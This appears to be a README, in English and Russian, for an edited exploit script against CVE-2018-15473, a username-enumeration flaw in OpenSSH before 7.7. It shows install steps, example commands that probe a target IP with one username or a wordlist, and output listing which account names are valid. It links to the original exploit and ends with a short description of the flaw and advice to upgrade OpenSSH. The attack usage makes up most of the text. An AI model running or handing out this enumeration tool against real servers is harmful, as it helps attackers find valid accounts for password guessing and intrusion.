
OpenSSH 2.3 < 7.7 - Username Enumeration
Эксплойт для перебора имен пользователей SSH (OpenSSH 2.3 < 7.7)
Отредактированная версия оригинального эксплойта: https://www.exploit-db.com/exploits/45233
#Ensure that you install the requirements:
foo@bar:~$ pip3 install -r requirements.txt
#For single username:
foo@bar:~$ ./CVE-2018-15473.py 192.168.1.20 -u root
[+] root is a valid username
#For multiple username:
foo@bar:~$ ./CVE-2018-15473.py 192.168.1.20 -w username_wordlist.txt
[+] root is a valid username
[-] mysql is an invalid username
[-] mike is an invalid username
[-] foo is an invalid username
[-] bar is an invalid username
Valid Users:
root
#For more option:
foo@bar:~$ ./CVE-2018-15473.py -h
Система по-разному реагирует на попытки аутентификации с действительными и недействительными учетными данными. Удаленный пользователь может отправлять специально сформированные запросы для определения действительных имен пользователей на целевой системе. Таким образом, удаленный пользователь может определить действительные имена пользователей на целевой системе.
Необходимо обновить OpenSSH-сервер до версии 7.7 или выше.